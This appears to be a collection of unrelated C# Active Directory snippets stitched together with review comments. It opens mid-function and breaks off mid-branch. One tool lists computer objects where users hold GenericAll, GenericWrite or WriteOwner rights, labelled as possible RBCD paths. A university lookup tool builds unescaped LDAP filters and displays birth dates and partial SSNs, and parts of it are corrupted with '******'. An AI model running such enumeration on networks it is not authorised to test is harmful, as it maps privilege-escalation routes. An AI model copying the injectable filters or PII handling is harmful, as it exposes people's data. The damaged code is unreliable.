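                    continue;
                }

                ADUser user = new ADUser();
                user.Dn = dn;
                user.Title = title;
                user.Name = name;
                user.Uuid = uuid.ToLowerInvariant();
                user.UserId = userId;
                user.Cpr = cpr;
                user.Email = email;
                users.Add(user);
            }
        }
    }

    return users;
}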
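/// <summary>
/// Audits the access control lists of all computer objects in the current domain and
/// prints every entry in which a user, a non-excluded group or another computer holds
/// GenericAll, GenericWrite or WriteOwner on a computer object.
/// </summary>
/// <param name="args">Command-line arguments (unused).</param>
/// <remarks>
/// Each printed line is a delegation to review: such rights allow the trustee to
/// reconfigure the computer object, so entries that are not required should be removed.
/// Findings are collected from parallel workers, so additions to the shared result list are
/// serialized with a lock; <c>List&lt;T&gt;</c> is not safe for concurrent writers and can
/// lose or corrupt entries otherwise.
/// NOTE(review): the access rule's AccessControlType is not inspected, so deny entries are
/// reported alongside allow entries and each finding needs manual validation.
/// NOTE(review): a computer without a dnshostname value is skipped by the catch below, so
/// the samaccountname fallback that follows it is never reached.
/// </remarks>
static void Main(string[] args)
{
    var stopWatch = Stopwatch.StartNew();
    string currentDomain = null;

    try
    {
        currentDomain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain().ToString();
        Console.WriteLine("This is the current domain: " + currentDomain);
    }
    catch
    {
        Console.WriteLine("Unable to get domain from current user context. Please specify domain to user");
    }

    if (currentDomain == null)
    {
        return;
    }

    // "corp.example" becomes "LDAP://DC=corp,DC=example".
    string searchBase = "LDAP://DC=" + currentDomain.Replace(".", ",DC=");

    // SIDs of all principals of interest, and their account names. A set keeps the
    // membership test constant-time for every access rule that is examined.
    var allSids = new HashSet<string>();
    Dictionary<string, string> sidMapping = new Dictionary<string, string>();

    // Groups that are expected to hold these rights and are therefore not reported.
    var excludedGroups = new HashSet<string>
    {
        "Domain Admins", "Account Operators", "Enterprise Admins", "Administrators", "DnsAdmins",
        "Schema Admins", "Key Admins", "Enterprise Key Admins", "Storage Replica Administrators"
    };

    using (DirectoryEntry adEntry = new DirectoryEntry(searchBase))
    {
        // All user accounts.
        using (DirectorySearcher userSearch = new DirectorySearcher(adEntry))
        {
            userSearch.Filter = "(&(samAccountType=805306368))";
            userSearch.PropertiesToLoad.Add("objectsid");
            userSearch.PropertiesToLoad.Add("samaccountname");
            userSearch.PageSize = int.MaxValue;
            userSearch.SizeLimit = int.MaxValue;

            Console.WriteLine("Searching for all users...");
            using (SearchResultCollection userResults = userSearch.FindAll())
            {
                Console.WriteLine("There are this many users: " + userResults.Count);
                foreach (SearchResult userResult in userResults)
                {
                    var objectID = new SecurityIdentifier((byte[])userResult.Properties["objectsid"][0], 0).ToString();
                    allSids.Add(objectID);
                    sidMapping.Add(objectID, userResult.Properties["samaccountname"][0].ToString());
                }
            }
        }

        // All groups except the excluded ones.
        using (DirectorySearcher groupSearch = new DirectorySearcher(adEntry))
        {
            groupSearch.Filter = "(&(objectCategory=group))";
            groupSearch.PropertiesToLoad.Add("objectsid");
            groupSearch.PropertiesToLoad.Add("samaccountname");
            groupSearch.PageSize = int.MaxValue;
            groupSearch.SizeLimit = int.MaxValue;

            Console.WriteLine("Searching for all groups...");
            using (SearchResultCollection groupResults = groupSearch.FindAll())
            {
                Console.WriteLine("There are this many groups: " + groupResults.Count);
                foreach (SearchResult groupResult in groupResults)
                {
                    string groupName = groupResult.Properties["samaccountname"][0].ToString();
                    if (excludedGroups.Contains(groupName))
                    {
                        continue;
                    }

                    var objectID = new SecurityIdentifier((byte[])groupResult.Properties["objectsid"][0], 0).ToString();
                    allSids.Add(objectID);
                    sidMapping.Add(objectID, groupName);
                }
            }
        }

        // All computer accounts, including their security descriptors.
        Console.WriteLine("Searching for all computers...");
        using (DirectorySearcher aclSearch = new DirectorySearcher(adEntry))
        {
            aclSearch.Filter = "(&(samAccountType=805306369))";
            var attributes = new[] { "samaccountname", "ntsecuritydescriptor", "objectsid", "dnshostname" };
            aclSearch.PropertiesToLoad.AddRange(attributes);
            aclSearch.SecurityMasks = SecurityMasks.Dacl | SecurityMasks.Owner;
            aclSearch.SizeLimit = int.MaxValue;
            aclSearch.PageSize = int.MaxValue;

            using (SearchResultCollection aclResults = aclSearch.FindAll())
            {
                // Computers are principals too, so their SIDs join the lookup set.
                List<SearchResult> resultList = new List<SearchResult>();
                foreach (SearchResult computerResult in aclResults)
                {
                    var objectID = new SecurityIdentifier((byte[])computerResult.Properties["objectsid"][0], 0).ToString();
                    allSids.Add(objectID);
                    sidMapping.Add(objectID, computerResult.Properties["samaccountname"][0].ToString());
                    resultList.Add(computerResult);
                }

                Console.WriteLine("There are this many computers: " + aclResults.Count);

                List<rbcd> rbcdList = new List<rbcd>();
                object rbcdListGate = new object();

                Parallel.ForEach(resultList, (SearchResult aclResult) =>
                {
                    var computerProps = aclResult.Properties;
                    var computerSid = new SecurityIdentifier((byte[])computerProps["objectsid"][0], 0).ToString();

                    ActiveDirectorySecurity adsd = new ActiveDirectorySecurity();
                    adsd.SetSecurityDescriptorBinaryForm(computerProps["ntSecurityDescriptor"][0] as byte[]);
                    AuthorizationRuleCollection arc = adsd.GetAccessRules(true, false, typeof(System.Security.Principal.SecurityIdentifier));

                    // The host name is the same for every rule of this computer, so it is
                    // resolved once. A computer without the attribute is skipped entirely.
                    string hostname = null;
                    try
                    {
                        hostname = computerProps["dnshostname"][0].ToString();
                    }
                    catch
                    {
                        return;
                    }

                    if (hostname == null)
                    {
                        hostname = computerProps["samaccountname"][0].ToString();
                    }

                    foreach (ActiveDirectoryAccessRule adRule in arc)
                    {
                        string sid = adRule.IdentityReference.ToString();

                        string privilege;
                        if (adRule.ActiveDirectoryRights == ActiveDirectoryRights.GenericAll)
                        {
                            privilege = "GenericAll";
                        }
                        else if (adRule.ActiveDirectoryRights.ToString().Contains("GenericWrite"))
                        {
                            privilege = "GenericWrite";
                        }
                        else if (adRule.ActiveDirectoryRights.ToString().Contains("WriteOwner"))
                        {
                            privilege = "WriteOwner";
                        }
                        else
                        {
                            continue;
                        }

                        // Report only known principals, and never a computer's rights on itself.
                        if (allSids.Contains(sid) && sid != computerSid)
                        {
                            var finding = new rbcd(sidMapping[sid], hostname, privilege);
                            lock (rbcdListGate)
                            {
                                rbcdList.Add(finding);
                            }
                        }
                    }
                });

                Console.WriteLine("Execution time = {0} seconds", stopWatch.Elapsed.TotalSeconds);
                Console.WriteLine("Number of possible RBCD ACLs: " + rbcdList.Count);

                foreach (rbcd oneRbcd in rbcdList)
                {
                    Console.WriteLine("RBCD ACL:\nSource: " + oneRbcd.Source + "\nDestination: " + oneRbcd.Destination + "\nPrivilege: " + oneRbcd.Privilege + "\n");
                }
            }
        }
    }
}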
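/// <summary>
/// Returns the userProxy objects found below this application-directory context.
/// </summary>
/// <param name="maxRecords">
/// Maximum number of search results to process; zero or a negative value means no limit.
/// </param>
/// <returns>The principals that could be resolved from the search results.</returns>
/// <exception cref="NotSupportedException">
/// The context type is <c>Machine</c> or <c>Domain</c>.
/// </exception>
/// <remarks>
/// The context type is checked before any directory object is created, and the entry,
/// searcher and result collection are disposed when the method returns.
/// Results that cannot be resolved to a principal are skipped silently.
/// NOTE(review): the distinguished name is taken as the text after the last '/' of the
/// result path. A DN that itself contains an escaped '/' would be cut short by this -
/// confirm whether such names occur.
/// </remarks>
public List<UserProxyPrincipal> GetChildUserProxyObjects(int maxRecords)
{
    if (ContextType == ContextType.Machine || ContextType == ContextType.Domain)
    {
        throw new NotSupportedException(
            "This functionality is only available for ApplicationDirectory ContextType PrincipalContext objects.");
    }

    DirectoryEntry directoryDe;
    if (ContextType == ContextType.ApplicationDirectory)
    {
        directoryDe = !string.IsNullOrEmpty(Container) && !string.IsNullOrEmpty(Name)
            ? new DirectoryEntry(string.Format("LDAP://{0}/{1}", Name, Container))
            : new DirectoryEntry(string.Format("LDAP://{0}", Name));
    }
    else
    {
        directoryDe = new DirectoryEntry();
    }

    var children = new List<UserProxyPrincipal>();

    using (directoryDe)
    using (var search = new DirectorySearcher(directoryDe)
    {
        Tombstone = false,
        Asynchronous = true,
        PageSize = 100,
        Filter = "(objectClass=userProxy)"
    })
    using (SearchResultCollection results = search.FindAll())
    {
        var processed = 0;

        foreach (SearchResult result in results)
        {
            // The limit counts processed results, including ones that fail to resolve.
            processed++;
            if (maxRecords > 0 && processed > maxRecords)
            {
                break;
            }

            var pieces = result.Path.Split('/');
            var dn = pieces[pieces.Length - 1];

            try
            {
                children.Add(UserProxyPrincipal.FindByIdentity(this, IdentityType.DistinguishedName, dn));
            }
            catch
            {
                // Deliberate best effort: one unresolvable entry must not fail the listing.
            }
        }
    }

    return children;
}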
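/// <summary>
/// Searches the directory for department entries and maps them to <see cref="ADDepartment"/> objects.
/// </summary>
/// <param name="path">Appended to "LDAP://" plus the configured Domain to form the search root.</param>
/// <param name="objFilter">
/// LDAP filter, assigned to the searcher unchanged. Callers must not build it from unescaped
/// user input.
/// </param>
/// <param name="dicPropertes">
/// Maps directory attribute names (the keys, which are also the attributes loaded) to the
/// ADDepartment property names (the values) they are copied into.
/// </param>
/// <param name="pathAnalyseClass">
/// Name of the type in assembly "Yinhe.ProcessingCenter" that is instantiated to interpret paths.
/// </param>
/// <returns>
/// The list produced by the analyser's filter. It is empty when the authorize type is neither
/// anonymous nor none, and may be partial when an exception interrupted the search (the
/// exception message is written to the console).
/// </returns>
public List<ADDepartment> SearchDepartment(string path, string objFilter, Dictionary<string, string> dicPropertes, string pathAnalyseClass)
{
    List<ADDepartment> depList = new List<ADDepartment>();
    string[] arrPropertes = dicPropertes.Keys.ToArray();
    try
    {
        path = "LDAP://" + (String.IsNullOrEmpty(this.Domain) == false ? this.Domain : "") + path;

        DirectoryEntry root = null;
        if (authorizeType == AuthorizeType.anonymous)
        {
            // Anonymous bind: the query runs with whatever the server grants unauthenticated clients.
            root = new DirectoryEntry(path, "", "", AuthenticationTypes.Anonymous);
        }
        else if (authorizeType == AuthorizeType.none)
        {
            // NOTE(review): AuthenticationTypes.None makes the LDAP provider use a simple bind,
            // so UserName/PassWord are sent unencrypted unless the connection itself is
            // protected (LDAPS). Prefer a secure bind where the server supports it.
            root = new DirectoryEntry(path, this.UserName, this.PassWord, AuthenticationTypes.None);
        }

        if (root != null)
        {
            using (root)
            using (DirectorySearcher searcher = new DirectorySearcher())
            {
                Console.WriteLine("开始遍历AD部门" + root.Path);
                searcher.SearchRoot = root;
                searcher.SearchScope = SearchScope.Subtree;
                searcher.Filter = objFilter;
                searcher.PropertiesToLoad.AddRange(arrPropertes);

                // The result collection is disposed explicitly rather than left to the finalizer.
                using (SearchResultCollection results = searcher.FindAll())
                {
                    foreach (SearchResult result in results)
                    {
                        ADDepartment dep = new ADDepartment();
                        foreach (string propName in result.Properties.PropertyNames)
                        {
                            // Attributes without a mapping are skipped. The indexer used before
                            // threw KeyNotFoundException for them, which ended the whole search.
                            string targetName;
                            if (dicPropertes.TryGetValue(propName, out targetName) && targetName != null)
                            {
                                dep.SetDynamicProperty(targetName, result.Properties[propName][0].ToString());
                            }
                        }

                        // NOTE(review): pathAnalyseClass decides which type gets instantiated.
                        // It should come from trusted configuration or an allow-list, never from
                        // request data. Example value: "Yinhe.ProcessingCenter.SynAD.PathAnalyseXH".
                        IPathAnalyse analyse = (IPathAnalyse)Activator.CreateInstance("Yinhe.ProcessingCenter", pathAnalyseClass).Unwrap();
                        if (analyse != null)
                        {
                            if (String.IsNullOrEmpty(dep.Name) == false)
                            {
                                dep.Code = analyse.GetDepCode(dep.Path);
                                dep.Level = analyse.GetDepLevel(dep.Path);
                                dep.ParentName = analyse.GetDepParentName(dep.Path);
                                dep.GrandParentName = analyse.GetGrandParentName(dep.Path);

                                if (pathAnalyseClass != "Yinhe.ProcessingCenter.SynAD.PathAnalyseHQC") // Zhonghai Investment
                                {
                                    using (DirectoryEntry entry = result.GetDirectoryEntry())
                                    {
                                        dep.Guid = entry.Guid.ToString();
                                    }
                                }
                                else
                                {
                                    // The raw "cn=org" node name is replaced by a display label.
                                    if (string.Equals(dep.ParentName, "cn=org", StringComparison.OrdinalIgnoreCase))
                                    {
                                        dep.ParentName = "华侨城组织架构";
                                    }
                                    if (string.Equals(dep.GrandParentName, "cn=org", StringComparison.OrdinalIgnoreCase))
                                    {
                                        dep.GrandParentName = "华侨城组织架构";
                                    }
                                }
                            }
                            depList = analyse.GetDepListFilter(depList, dep);
                        }
                        Console.WriteLine(dep.Name);
                    }
                }
            }
        }
    }
    catch (Exception ex)
    {
        // Failures are reported on the console only; the caller receives what was collected so far.
        Console.WriteLine(ex.Message);
    }
    return depList;
}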
/// <summary>
/// Determines a domain name for the given domain controller.
/// </summary>
/// <remarks>
/// Searches the configuration naming context for msExchRecipientPolicy objects with
/// msExchPolicyOrder=2147483647 and returns the text after '@' of the first gatewayProxy
/// value that starts with "SMTP:" and contains '@'. When no such value exists, the result is
/// the local host's DNS name with its first label removed, or the whole host name when it
/// has no usable suffix.
/// NOTE(review): DomainController is passed to LDAPPrefix and concatenated into the bind
/// path; LDAPPrefix is not shown here, so confirm the value is validated before this call.
/// </remarks>
/// <param name="DomainController">Domain controller used to build the LDAP paths.</param>
/// <returns>The domain part of the SMTP address, or the local DNS suffix as a fallback.</returns>
/// <exception cref="IISGeneralCOMException">Wraps a COMException raised by the directory lookup.</exception>
internal static string GetFullyQualifiedDomainName(string DomainController)
{
    TaskLogger.LogEnter();

    DirectoryEntry rootDse = null;
    DirectoryEntry configurationContext = null;
    DirectorySearcher policySearcher = null;
    SearchResultCollection policies = null;

    try
    {
        rootDse = new DirectoryEntry(NewOwaVirtualDirectory.LDAPPrefix(DomainController) + "RootDSE");
        configurationContext = new DirectoryEntry(
            NewOwaVirtualDirectory.LDAPPrefix(DomainController) + rootDse.Properties["configurationNamingContext"].Value);

        policySearcher = new DirectorySearcher(configurationContext);
        policySearcher.Filter = "(&(objectClass=msExchRecipientPolicy)(msExchPolicyOrder=2147483647))";
        policySearcher.PropertiesToLoad.Add("gatewayProxy");
        policySearcher.SearchScope = SearchScope.Subtree;
        policies = policySearcher.FindAll();

        foreach (SearchResult policy in policies)
        {
            foreach (object proxyValue in policy.Properties["gatewayProxy"])
            {
                string address = proxyValue.ToString();
                if (!address.StartsWith("SMTP:"))
                {
                    continue;
                }

                int atIndex = address.IndexOf('@');
                if (atIndex < 0)
                {
                    continue;
                }

                TaskLogger.LogExit();
                return address.Substring(atIndex + 1);
            }
        }
    }
    catch (COMException ex)
    {
        throw new IISGeneralCOMException(ex.Message, ex.ErrorCode, ex);
    }
    finally
    {
        // Released in reverse order of creation.
        policies?.Dispose();
        policySearcher?.Dispose();
        configurationContext?.Dispose();
        rootDse?.Dispose();
    }

    TaskLogger.LogExit();

    // Fallback: derive the suffix from the local machine's DNS host name.
    string localFqdn = Dns.GetHostEntry(Dns.GetHostName()).HostName;
    int firstDot = localFqdn.IndexOf('.');
    bool hasSuffix = firstDot >= 0 && firstDot < localFqdn.Length - 1;
    return hasSuffix ? localFqdn.Substring(firstDot + 1) : localFqdn;
}
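/// <summary>
/// Searches the directory for user entries and maps them to <see cref="ADUser"/> objects.
/// </summary>
/// <param name="path">Appended to "LDAP://" plus the configured Domain to form the search root.</param>
/// <param name="objFilter">
/// LDAP filter, assigned to the searcher unchanged. Callers must not build it from unescaped
/// user input.
/// </param>
/// <param name="dicPropertes">
/// Maps directory attribute names (the keys, which are also the attributes loaded) to the
/// ADUser property names (the values) they are copied into.
/// </param>
/// <param name="pathAnalyseClass">
/// Name of the type in assembly "Yinhe.ProcessingCenter" that is instantiated to interpret paths.
/// </param>
/// <returns>
/// The list produced by the analyser's filter. It is empty when the authorize type is neither
/// anonymous nor none, and may be partial when an exception interrupted the search (the
/// exception message is written to the console).
/// </returns>
public List<ADUser> SearchUser(string path, string objFilter, Dictionary<string, string> dicPropertes, string pathAnalyseClass)
{
    List<ADUser> userList = new List<ADUser>();
    string[] arrPropertes = dicPropertes.Keys.ToArray();
    try
    {
        path = "LDAP://" + (String.IsNullOrEmpty(this.Domain) == false ? this.Domain : "") + path;

        DirectoryEntry root = null;
        if (authorizeType == AuthorizeType.anonymous)
        {
            // Anonymous bind: the query runs with whatever the server grants unauthenticated clients.
            root = new DirectoryEntry(path, "", "", AuthenticationTypes.Anonymous);
        }
        else if (authorizeType == AuthorizeType.none)
        {
            // NOTE(review): AuthenticationTypes.None makes the LDAP provider use a simple bind,
            // so UserName/PassWord are sent unencrypted unless the connection itself is
            // protected (LDAPS). Prefer a secure bind where the server supports it.
            root = new DirectoryEntry(path, this.UserName, this.PassWord, AuthenticationTypes.None);
        }

        if (root != null)
        {
            using (root)
            using (DirectorySearcher searcher = new DirectorySearcher())
            {
                Console.WriteLine(root.Path);
                searcher.SearchRoot = root;
                searcher.SearchScope = SearchScope.Subtree;
                searcher.Filter = objFilter;
                searcher.PageSize = 10000;
                searcher.PropertiesToLoad.AddRange(arrPropertes);

                // The result collection is disposed explicitly rather than left to the finalizer.
                using (SearchResultCollection results = searcher.FindAll())
                {
                    foreach (SearchResult result in results)
                    {
                        ADUser user = new ADUser();
                        foreach (string propName in result.Properties.PropertyNames)
                        {
                            // Single lookup; attributes without a mapping are skipped.
                            string targetName;
                            if (dicPropertes.TryGetValue(propName, out targetName) && targetName != null)
                            {
                                user.SetDynamicProperty(targetName, result.Properties[propName][0].ToString());
                            }
                        }

                        // NOTE(review): pathAnalyseClass decides which type gets instantiated.
                        // It should come from trusted configuration or an allow-list, never from
                        // request data.
                        IPathAnalyse analyse = (IPathAnalyse)Activator.CreateInstance("Yinhe.ProcessingCenter", pathAnalyseClass).Unwrap();
                        if (analyse != null)
                        {
                            if (String.IsNullOrEmpty(user.Name) == false)
                            {
                                if (pathAnalyseClass != "Yinhe.ProcessingCenter.SynAD.PathAnalyseHQC")
                                {
                                    using (DirectoryEntry entry = result.GetDirectoryEntry())
                                    {
                                        user.Guid = entry.Guid.ToString();
                                    }
                                    user.Code = analyse.GetUserCode(user.Path);
                                    user.DepartMentID = analyse.GetUserDepartment(user.Path);
                                    user.GrandDepartMentID = analyse.GetUserGrandDepartment(user.Path);
                                }
                                else
                                {
                                    user.DepartMentGuid = user.Code;
                                }
                            }
                            userList = analyse.GetUserListFilter(userList, user);
                        }
                    }
                }
            }
        }
    }
    catch (Exception ex)
    {
        // Failures are reported on the console only; the caller receives what was collected so far.
        Console.WriteLine(ex.Message);
    }
    return userList;
}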
/// <summary>
/// Looks up a person, visitor account or registered device in the directory and shows a
/// text report in resultBox; optionally writes the raw attribute dumps to a file.
/// </summary>
/// <param name="pantherID">ID searched as EmployeeID (length 7), as CN (length 10) and as fiunsseowner.</param>
/// <param name="fiuUsername">User name searched as sAMAccountName; the last branch also treats it as a MAC address.</param>
// NOTE(review): every filter below is built by concatenating pantherID / fiuUsername (or
//   strings derived from them) into the LDAP filter text. The values are not escaped, so
//   '(', ')', '*' or '\' in the input change the query. Escape filter values (RFC 4515) or
//   validate the expected formats (digits, MAC notation) before building the filter.
// NOTE(review): the report shown in resultBox includes date of birth, last four SSN digits
//   and zip code (fiubirthdate, fiul4ssn, fiucontactzip). emplOutput, studentOutput,
//   visitorOutput and macOutput collect every attribute of each matched entry and are
//   written out when exportLogFileToolStripMenuItem is checked, so the export carries the
//   same personal data in plain text.
// NOTE(review): the StreamWriter at the end is given Environment.GetFolderPath(Personal),
//   which is a folder and not a file name - presumably a file inside that folder was
//   intended; confirm.
// NOTE(review): the first branch is taken whenever fiuUsername is non-empty, so the later
//   "MAC Registration" branch (fiuUsername.Length == 17 || 12) looks unreachable - confirm.
// NOTE(review): pwdLastSet and whenCreated are read outside any try block in the employee
//   and student sections, and most attributes in the visitor / dash / no-separator MAC
//   sections are unguarded; a missing attribute there ends the method with an exception.
// NOTE(review): account status is derived by comparing userAccountControl with the exact
//   values 512, 544 and 546; any other flag combination is reported as "Other".
//   Password expiry is computed with a hard-coded 182-day lifetime.
// NOTE(review): none of the DirectorySearcher / DirectoryEntry objects are disposed.
// NOTE(review): this listing is damaged: several expressions contain "******" where code
//   was lost, and `new DirectoryEntry(/*LDAP HERE*/)))` has an unbalanced parenthesis.
//   The code is reproduced unchanged.
private void runSearch(string pantherID, string fiuUsername) { String output = "", emplOutput = "", studentOutput = "", visitorOutput = "", macOutput = ""; if (pantherID.Length == 7 || fiuUsername != "") // Panther ID { DirectorySearcher emplDS = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/)); if (fiuUsername != "") { emplDS.Filter = "(&((&(objectCategory=Person)))(sAMAccountName=" + fiuUsername + "))"; } else { emplDS.Filter = "(&((&(objectCategory=Person)))(EmployeeID=" + pantherID + "))"; } SearchResult emplSR = emplDS.FindOne(); if (emplSR != null) { ResultPropertyCollection emplResult = emplSR.Properties; foreach (string myKey in emplResult.PropertyNames) { emplOutput += myKey + " = "; foreach (Object myCollection in emplResult[myKey]) { emplOutput += myCollection + " "; } emplOutput += Environment.NewLine; } try { output += "Name: " + emplSR.Properties["displayName"][0]; } catch (Exception) { output += "Name: N/A"; } output += Environment.NewLine + "-----------------------" + Environment.NewLine; try { output += "Username: "******"sAMAccountName"][0] + Environment.NewLine; } catch (Exception) { output += "Username: N/A\n"; } try { output += "Panther ID: " + emplSR.Properties["EmployeeID"][0] + Environment.NewLine; } catch (Exception) { output += "Panther ID: N/A" + Environment.NewLine; } try { int accountState = Convert.ToInt32(emplSR.Properties["userAccountControl"][0]); if (accountState.Equals(544) | accountState.Equals(512)) { output += "Status: Enabled" + Environment.NewLine; } else if (accountState.Equals(546)) { output += "Status: Disabled" + Environment.NewLine; } else { output += "Status: Other" + Environment.NewLine; } } catch (Exception e) { output += "Status: Unknown" + Environment.NewLine; ; } try { output += "Department: " + emplSR.Properties["department"][0].ToString() + Environment.NewLine + Environment.NewLine; } catch (Exception) { output += "Department: Unknown" + Environment.NewLine + Environment.NewLine; } output += "Demographic 
Information" + Environment.NewLine + "----------------------------" + Environment.NewLine; try { output += "Date of Birth: " + emplSR.Properties["fiubirthdate"][0] + Environment.NewLine; } catch (Exception) { output += "Date of Birth: N/A" + Environment.NewLine; } try { output += "Last 4 SSN: " + emplSR.Properties["fiul4ssn"][0] + Environment.NewLine; } catch (Exception) { output += "Last 4 SSN: N/A" + Environment.NewLine; } try { output += "Zip Code: " + emplSR.Properties["fiucontactzip"][0] + Environment.NewLine + Environment.NewLine; } catch (Exception) { output += "Zip Code: N/A" + Environment.NewLine + Environment.NewLine; } output += "Extra Information" + Environment.NewLine + "-----------------------" + Environment.NewLine; try { long expirationTime = (long)emplSR.Properties["accountExpires"][0]; if (expirationTime > 0) { output += "**ACCOUNT TO EXPIRE ON " + DateTime.FromFileTime(expirationTime) + "**" + Environment.NewLine; } } catch (Exception e) { output += ""; } try { output += "Lync Enabled: " + emplSR.Properties["msRTCSIP-UserEnabled"][0] + Environment.NewLine; } catch (Exception e) { output += "MS Lync Enabled: Unknown" + Environment.NewLine; } try { String mail = emplSR.Properties["mail"][0].ToString(); } catch { } String targetaddress = ""; try { targetaddress = emplSR.Properties["targetaddress"][0].ToString(); } catch { } String homemdb = ""; try { homemdb = emplSR.Properties["homemdb"][0].ToString(); } catch { } if (!(targetaddress.Equals("")) && !(homemdb.Equals(""))) { output += "Mailbox Type: Unknown" + Environment.NewLine; // may be broken } else if ((targetaddress.Equals("")) && !(homemdb.Equals(""))) { output += "Mailbox Type: Exchange" + Environment.NewLine; } else if (!(targetaddress.Equals("")) && (homemdb.Equals(""))) { output += "Mailbox Type: Office 365" + Environment.NewLine; } else if ((targetaddress.Equals("")) && (homemdb.Equals(""))) { output += "Mailbox Type: None" + Environment.NewLine; } else { output += "Mailbox Type: 
Unknown" + Environment.NewLine; } try { if ((long)emplSR.Properties["LockOutTime"][0] == 0) { output += "Locked out: False" + Environment.NewLine; } else { output += "Locked out: True" + Environment.NewLine; } } catch (Exception) { output += "Locked out: Unknown" + Environment.NewLine; } if ((long)emplSR.Properties["pwdLastSet"][0] == 0) { output += "Password Last Set : Not Set or May be Default" + Environment.NewLine; } else { output += "Password Last Set : " + DateTime.FromFileTime((long)emplSR.Properties["pwdLastSet"][0]).ToString() + Environment.NewLine; } DateTime d1 = DateTime.Now; DateTime d2 = DateTime.FromFileTime((long)emplSR.Properties["pwdLastSet"][0]); System.TimeSpan diff = d1.Subtract(d2); int daysLeft = 182 - diff.Days; // 6 months == 182.621 days if (daysLeft <= 0) { output += "**PASSWORD IS EXPIRED**" + Environment.NewLine; } else if (daysLeft <= 14) { output += String.Format("**PASSWORD WILL EXPIRE IN {0} DAY(S)**" + Environment.NewLine, daysLeft); } try { output += "Last Logon: " + DateTime.FromFileTime((long)emplSR.Properties["lastLogon"][0]) + Environment.NewLine; } catch (Exception) { output += "Last Login: Unknown" + Environment.NewLine; } try { output += "Bad Password: "******"badPasswordTime"][0]) + Environment.NewLine; } catch (Exception) { output += "Bad Password: Unknown" + Environment.NewLine; } output += "When Created: " + emplSR.Properties["whenCreated"][0] + Environment.NewLine; } else { output += ""; } DirectorySearcher studentDS = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/))); if (fiuUsername != "") { studentDS.Filter = "(&((&(objectCategory=Person)))(sAMAccountName=" + fiuUsername + "))"; } else { studentDS.Filter = "(&((&(objectCategory=Person)))(EmployeeID=" + pantherID + "))"; } SearchResult studentSR = studentDS.FindOne(); if (studentSR != null) { if (emplSR != null) { output += Environment.NewLine + "==============================" + Environment.NewLine; } ResultPropertyCollection studentResult = 
studentSR.Properties; foreach (string myKey in studentResult.PropertyNames) { studentOutput += myKey + " = "; foreach (Object myCollection in studentResult[myKey]) { studentOutput += myCollection + " "; } studentOutput += Environment.NewLine; } try { output += "Name: " + studentSR.Properties["displayName"][0]; } catch (Exception) { output += "Name: Unknown"; } output += Environment.NewLine + "-----------------------" + Environment.NewLine; try { output += "Username: "******"sAMAccountName"][0] + Environment.NewLine; } catch (Exception) { output += "Username: Unknown" + Environment.NewLine; } try { output += "Panther ID: " + studentSR.Properties["EmployeeID"][0] + Environment.NewLine; } catch (Exception) { output += "Panther ID: Unknown" + Environment.NewLine; } try { String fiuStatus = studentSR.Properties["fiuStatus"][0].ToString(); output += "Status: " + fiuStatus + Environment.NewLine; } catch (Exception) { output += "Status: Unknown" + Environment.NewLine; } output += Environment.NewLine + "Demographic Information" + Environment.NewLine + "----------------------------" + Environment.NewLine; try { output += "Date of Birth: " + studentSR.Properties["fiubirthdate"][0] + Environment.NewLine; } catch (Exception) { output += "Date of Birth: N/A" + Environment.NewLine; } try { output += "Last 4 SSN: " + studentSR.Properties["fiul4ssn"][0] + Environment.NewLine; } catch (Exception) { output += "Last 4 SSN: N/A" + Environment.NewLine; } try { output += "Zip Code: " + studentSR.Properties["fiucontactzip"][0] + Environment.NewLine + Environment.NewLine; } catch (Exception) { output += "Zip Code: N/A" + Environment.NewLine + Environment.NewLine; } output += "Extra Information" + Environment.NewLine + "-----------------------" + Environment.NewLine; try { if ((long)studentSR.Properties["LockOutTime"][0] == 0) { output += "Locked out: False" + Environment.NewLine; } else { output += "Locked out: True" + Environment.NewLine; } } catch (Exception) { output += "Locked out? 
UNKNOWN" + Environment.NewLine; } if ((long)studentSR.Properties["pwdLastSet"][0] == 0) { output += "Password Last Set : Not Set or May be Default" + Environment.NewLine; } else { output += "Password Last Set : " + DateTime.FromFileTime((long)studentSR.Properties["pwdLastSet"][0]).ToString() + Environment.NewLine; } DateTime d1 = DateTime.Now; DateTime d2 = DateTime.FromFileTime((long)studentSR.Properties["pwdLastSet"][0]); System.TimeSpan diff = d1.Subtract(d2); int daysLeft = 182 - diff.Days; // 6 months == 182.621 days if (daysLeft <= 0) { output += "**PASSWORD IS EXPIRED**" + Environment.NewLine; } else if (daysLeft <= 14) { output += String.Format("**PASSWORD WILL EXPIRE IN {0} DAY(S)**" + Environment.NewLine, daysLeft); } try { output += "Last Logon: " + DateTime.FromFileTime((long)studentSR.Properties["lastLogon"][0]) + Environment.NewLine; } catch (Exception) { output += "Last Login: Unknown" + Environment.NewLine; } try { output += "Bad Password: "******"badPasswordTime"][0]) + Environment.NewLine; } catch (Exception) { output += "Bad Password: Unknown" + Environment.NewLine; } output += "When Created: " + studentSR.Properties["whenCreated"][0] + Environment.NewLine; } if (pantherID != "" && (emplSR != null|| studentSR !=null)) { DirectorySearcher devicesDS = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/))); devicesDS.Filter = "(&((&(objectCategory=Person)))(fiunsseowner=" + pantherID + "))"; SearchResultCollection devicesSR = devicesDS.FindAll(); if (devicesSR != null) { output += Environment.NewLine + "==============================" + Environment.NewLine; foreach (SearchResult deviceSR in devicesSR) { output += "MAC: " + deviceSR.Properties["GivenName"][0] + Environment.NewLine; output += "Description: " + deviceSR.Properties["fiuNSSEdescription"][0] + Environment.NewLine + Environment.NewLine; } } } else if(emplSR == null && studentSR == null) { output += "No Results Found" + Environment.NewLine; } } else if (pantherID.Length == 10)// Visitor 
